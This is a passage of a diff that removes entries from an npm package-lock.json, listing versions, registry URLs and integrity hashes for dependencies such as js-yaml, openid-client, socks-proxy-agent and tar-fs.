"^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.3.0", - "node-fetch": "^2.6.9", - "openid-client": "^6.1.3", - "rfc4648": "^1.3.0", - "socks-proxy-agent": "^8.0.4", - "stream-buffers": "^3.0.2", - "tar-fs": "^3.0.8", - "ws": "^8.18.2" - } - }, - "@types/ip-address": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/@types/ip-address/-/ip-address-7.0.0.tgz", - "integrity": "sha512-OyDm4EwZsYPDUjXz3ktiuQE8PJIPO1uUZMfvZMcWmykWjm3WVyI78rAnHkqKV3pMR7iDRKfalI+RxG5JBDUo5w==", - "dev": true, - "requires": { - "ip-address": "*" - } - }, - "@types/js-yaml": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", - "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==" - }, - "@types/lodash": { - "version": "4.14.195", - "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.195.tgz", - "integrity": "sha512-Hwx9EUgdwf2GLarOjQp5ZH8ZmblzcbTBC2wtQWNKARBSxM9ezRIAUpeDTgoQRAFB0+8CNWXVA9+MaSOzOF3nPg==", - "dev": true - }, - "@types/matcher": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@types/matcher/-/matcher-1.1.0.tgz", - "integrity": "sha512-ABJ5kIpPHprtDTLh3xoB7QoGsqhGa9oUvLRiSBe/Sj0fPrxSpZezkussmjiR+QWtjqhrmfyV9vs6BpPPfygDUQ==", - "dev": true - }, - "@types/mustache": { - "version": "4.2.6", - "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.2.6.tgz", - "integrity": "sha512-t+8/QWTAhOFlrF1IVZqKnMRJi84EgkIK5Kh0p2JV4OLywUvCwJPFxbJAl7XAow7DVIHsF+xW9f1MVzg0L6Szjw==", - "dev": true - }, - "@types/node": { - "version": "22.16.0", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.0.tgz", - "integrity": "sha512-B2egV9wALML1JCpv3VQoQ+yesQKAmNMBIAY7OteVrikcOcAkWm+dGL6qpeCktPjAv6N1JLnhbNiqS35UpFyBsQ==", - "requires": { - "undici-types": "~6.21.0" - }, - "dependencies": { - "undici-types": { - "version": "6.21.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", - "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==" - } - } - }, - "@types/node-fetch": { - "version": "2.6.12", - "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", - "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", - "requires": { - "@types/node": "*", - "form-data": "^4.0.0" - } - }, - "@types/stream-buffers": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", - "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", - "requires": { - "@types/node": "*" - } - }, - "agent-base": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", - "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==" - }, - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "b4a": { - "version": "1.6.7", - "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", - "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==" - }, - "bare-events": { - "version": "2.5.4", - "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", - "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", - "optional": true - }, - "bare-fs": { - "version": "4.1.5", - "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", - "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", - "optional": true, - "requires": { - "bare-events": "^2.5.4", - "bare-path": "^3.0.0", - "bare-stream": "^2.6.4" - } - }, - "bare-os": { - "version": "3.6.1", - "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", - "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", - "optional": true - }, - "bare-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", - "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", - "optional": true, - "requires": { - "bare-os": "^3.0.1" - } - }, - "bare-stream": { - "version": "2.6.5", - "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", - "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", - "optional": true, - "requires": { - "streamx": "^2.21.0" - } - }, - "call-bind-apply-helpers": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", - "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", - "requires": { - "es-errors": "^1.3.0", - "function-bind": "^1.1.2" - } - }, - "clone-regexp": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/clone-regexp/-/clone-regexp-3.0.0.tgz", - "integrity": "sha512-ujdnoq2Kxb8s3ItNBtnYeXdm07FcU0u8ARAT1lQ2YdMwQC+cdiXX8KoqMVuglztILivceTtp4ivqGSmEmhBUJw==", - "requires": { - "is-regexp": "^3.0.0" - } - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "convert-hrtime": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/convert-hrtime/-/convert-hrtime-5.0.0.tgz", - "integrity": "sha512-lOETlkIeYSJWcbbcvjRKGxVMXJR+8+OQb/mTPbA4ObPMytYIsUbuOE0Jzy60hjARYszq1id0j8KgVhC+WGZVTg==" - }, - "debug": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", - "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", - "requires": { - "ms": "^2.1.3" - } - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" - }, - "dunder-proto": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", - "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", - "requires": { - "call-bind-apply-helpers": "^1.0.1", - "es-errors": "^1.3.0", - "gopd": "^1.2.0" - } - }, - "end-of-stream": { - "version": "1.4.5", - "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", - "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", - "requires": { - "once": "^1.4.0" - } - }, - "es-define-property": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", - "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==" - }, - "es-errors": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", - "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==" - }, - "es-object-atoms": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", - "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", - "requires": { - "es-errors": "^1.3.0" - } - }, - "es-set-tostringtag": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", - "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", - "requires": { - "es-errors": "^1.3.0", - "get-intrinsic": "^1.2.6", - "has-tostringtag": "^1.0.2", - "hasown": "^2.0.2" - } - }, - "esbuild": { - "version": "0.25.5", - "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.25.5.tgz", - "integrity": "sha512-P8OtKZRv/5J5hhz0cUAdu/cLuPIKXpQl1R9pZtvmHWQvrAUVd0UNIPT4IB4W3rNOqVO0rlqHmCIbSwxh/c9yUQ==", - "dev": true, - "requires": { - "@esbuild/aix-ppc64": "0.25.5", - "@esbuild/android-arm": "0.25.5", - "@esbuild/android-arm64": "0.25.5", - "@esbuild/android-x64": "0.25.5", - "@esbuild/darwin-arm64": "0.25.5", - "@esbuild/darwin-x64": "0.25.5", - "@esbuild/freebsd-arm64": "0.25.5", - "@esbuild/freebsd-x64": "0.25.5", - "@esbuild/linux-arm": "0.25.5", - "@esbuild/linux-arm64": "0.25.5", - "@esbuild/linux-ia32": "0.25.5", - "@esbuild/linux-loong64": "0.25.5", - "@esbuild/linux-mips64el": "0.25.5", - "@esbuild/linux-ppc64": "0.25.5", - "@esbuild/linux-riscv64": "0.25.5", - "@esbuild/linux-s390x": "0.25.5", - "@esbuild/linux-x64": "0.25.5", - "@esbuild/netbsd-arm64": "0.25.5", - "@esbuild/netbsd-x64": "0.25.5", - "@esbuild/openbsd-arm64": "0.25.5", - "@esbuild/openbsd-x64": "0.25.5", - "@esbuild/sunos-x64": "0.25.5", - "@esbuild/win32-arm64": "0.25.5", - "@esbuild/win32-ia32": "0.25.5", - "@esbuild/win32-x64": "0.25.5" - } - }, - "escape-string-regexp": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-5.0.0.tgz", - "integrity": "sha512-/veY75JbMK4j1yjvuUxuVsiS/hr/4iHs9FTT6cgTexxdE0Ly/glccBAkloH/DofkjRbZU3bnoj38mOmhkZ0lHw==" - }, - "fast-fifo": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", - "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==" - }, - "form-data": { - "version": "4.0.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", - "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "es-set-tostringtag": "^2.1.0", - "hasown": "^2.0.2", - "mime-types": "^2.1.12" - } - }, - "function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" - }, - "function-timeout": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/function-timeout/-/function-timeout-0.1.1.tgz", - "integrity": "sha512-0NVVC0TaP7dSTvn1yMiy6d6Q8gifzbvQafO46RtLG/kHJUBNd+pVRGOBoK44wNBvtSPUJRfdVvkFdD3p0xvyZg==" - }, - "get-intrinsic": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", - "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", - "requires": { - "call-bind-apply-helpers": "^1.0.2", - "es-define-property": "^1.0.1", - "es-errors": "^1.3.0", - "es-object-atoms": "^1.1.1", - "function-bind": "^1.1.2", - "get-proto": "^1.0.1", - "gopd": "^1.2.0", - "has-symbols": "^1.1.0", - "hasown": "^2.0.2", - "math-intrinsics": "^1.1.0" - } - }, - "get-proto": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", - "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", - "requires": { - "dunder-proto": "^1.0.1", - "es-object-atoms": "^1.0.0" - } - }, - "gopd": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", - "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==" - }, - "has-symbols": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", - "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==" - }, - "has-tostringtag": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", - "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", - "requires": { - "has-symbols": "^1.0.3" - } - }, - "hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "requires": { - "function-bind": "^1.1.2" - } - }, - "hpagent": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", - "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==" - }, - "ip-address": { - "version": "10.0.1", - "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-10.0.1.tgz", - "integrity": "sha512-NWv9YLW4PoW2B7xtzaS3NCot75m6nK7Icdv0o3lfMceJVRfSoQwqD4wEH5rLwoKJwUiZ/rfpiVBhnaF0FK4HoA==" - }, - "ip-regex": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/ip-regex/-/ip-regex-5.0.0.tgz", - "integrity": "sha512-fOCG6lhoKKakwv+C6KdsOnGvgXnmgfmp0myi3bcNwj3qfwPAxRKWEuFhvEFF7ceYIz6+1jRZ+yguLFAmUNPEfw==" - }, - "is-ip": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/is-ip/-/is-ip-5.0.1.tgz", - "integrity": "sha512-FCsGHdlrOnZQcp0+XT5a+pYowf33itBalCl+7ovNXC/7o5BhIpG14M3OrpPPdBSIQJCm+0M5+9mO7S9VVTTCFw==", - "requires": { - "ip-regex": "^5.0.0", - "super-regex": "^0.2.0" - } - }, - "is-regexp": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/is-regexp/-/is-regexp-3.1.0.tgz", - "integrity": "sha512-rbku49cWloU5bSMI+zaRaXdQHXnthP6DZ/vLnfdSKyL4zUzuWnomtOEiZZOd+ioQ+avFo/qau3KPTc7Fjy1uPA==" - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "jose": { - "version": "6.0.11", - "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", - "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==" - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "requires": { - "argparse": "^2.0.1" - } - }, - "jsbn": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", - "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==" - }, - "jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" - }, - "jsonpath-plus": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", - "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", - "requires": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - } - }, - "lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "matcher": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/matcher/-/matcher-5.0.0.tgz", - "integrity": "sha512-s2EMBOWtXFc8dgqvoAzKJXxNHibcdJMV0gwqKUaw9E2JBJuGUK7DrNKrA6g/i+v72TT16+6sVm5mS3thaMLQUw==", - "requires": { - "escape-string-regexp": "^5.0.0" - } - }, - "math-intrinsics": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", - "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==" - }, - "mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" - }, - "mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "requires": { - "mime-db": "1.52.0" - } - }, - "ms": { - "version": "2.1.3", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", - "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" - }, - "mustache": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/mustache/-/mustache-4.2.0.tgz", - "integrity": "sha512-71ippSywq5Yb7/tVYyGbkBggbU8H3u5Rz56fH60jGFgr8uHwxs+aSKeqmluIVzM0m0kB7xQjKS6qPfd0b2ZoqQ==" - }, - "node-fetch": { - "version": "2.6.12", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.12.tgz", - "integrity": "sha512-C/fGU2E8ToujUivIO0H+tpQ6HWo4eEmchoPIoXtxCrVghxdKq+QOHqEZW7tuP3KlV3bC8FRMO5nMCC7Zm1VP6g==", - "requires": { - "whatwg-url": "^5.0.0" - } - }, - "oauth4webapi": { - "version": "3.5.5", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.5.tgz", - "integrity": "sha512-1K88D2GiAydGblHo39NBro5TebGXa+7tYoyIbxvqv3+haDDry7CBE1eSYuNbOSsYCCU6y0gdynVZAkm4YPw4hg==" - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "requires": { - "wrappy": "1" - } - }, - "openid-client": { - "version": "6.6.2", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.2.tgz", - "integrity": "sha512-Xya5TNMnnZuTM6DbHdB4q0S3ig2NTAELnii/ASie1xDEr8iiB8zZbO871OWBdrw++sd3hW6bqWjgcmSy1RTWHA==", - "requires": { - "jose": "^6.0.11", - "oauth4webapi": "^3.5.4" - } - }, - "parse-domain": { - "version": "8.2.2", - "resolved": "https://registry.npmjs.org/parse-domain/-/parse-domain-8.2.2.tgz", - "integrity": "sha512-CoksenD3UDqphCHlXIcNh/TX0dsYLHo6dSAUC/QBcJRWJXcV5rc1mwsS4WbhYGu4LD4Uxc0v3ZzGo+OHCGsLcw==", - "requires": { - "is-ip": "^5.0.1" - } - }, - "pump": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", - "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", - "requires": { - "end-of-stream": "^1.1.0", - "once": "^1.3.1" - } - }, - "rfc4648": { - "version": "1.5.2", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", - "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" - }, - "smart-buffer": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", - "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==" - }, - "socks": { - "version": "2.8.5", - "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", - "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", - "requires": { - "ip-address": "^9.0.5", - "smart-buffer": "^4.2.0" - }, - "dependencies": { - "ip-address": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", - "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", - "requires": { - "jsbn": "1.1.0", - "sprintf-js": "^1.1.3" - } - } - } - }, - "socks-proxy-agent": { - "version": "8.0.5", - "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", - "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", - "requires": { - "agent-base": "^7.1.2", - "debug": "^4.3.4", - "socks": "^2.8.3" - } - }, - "sprintf-js": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", - "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==" - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "streamx": { - "version": "2.22.1", - "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", - "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", - "requires": { - "bare-events": "^2.2.0", - "fast-fifo": "^1.3.2", - "text-decoder": "^1.1.0" - } - }, - "super-regex": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/super-regex/-/super-regex-0.2.0.tgz", - "integrity": "sha512-WZzIx3rC1CvbMDloLsVw0lkZVKJWbrkJ0k1ghKFmcnPrW1+jWbgTkTEWVtD9lMdmI4jZEz40+naBxl1dCUhXXw==", - "requires": { - "clone-regexp": "^3.0.0", - "function-timeout": "^0.1.0", - "time-span": "^5.1.0" - } - }, - "tar-fs": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", - "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", - "requires": { - "bare-fs": "^4.0.1", - "bare-path": "^3.0.0", - "pump": "^3.0.0", - "tar-stream": "^3.1.5" - } - }, - "tar-stream": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", - "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", - "requires": { - "b4a": "^1.6.4", - "fast-fifo": "^1.2.0", - "streamx": "^2.15.0" - } - }, - "text-decoder": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", - "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", - "requires": { - "b4a": "^1.6.4" - } - }, - "time-span": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/time-span/-/time-span-5.1.0.tgz", - "integrity": 